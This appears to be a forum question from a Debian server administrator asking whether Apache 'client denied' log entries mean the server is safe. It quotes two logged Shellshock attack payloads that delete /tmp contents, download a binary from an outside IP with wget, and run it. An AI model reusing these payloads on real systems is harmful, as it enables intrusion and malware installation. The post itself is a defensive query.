I have a server with debian 7. I was checking the apache error log file and saw a few lines like this
[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
I might be mistaken, but because of this part () { :; };
I think someone was trying to use the shellshock bug.
But independent from whether this is shellshock or not, the question is - if I have lines in logs with message
client denied by server configuration
is this smth that I should worry about, or because the request was declined I can ignore it - being sure that no malicious scripts were downloaded/executed ?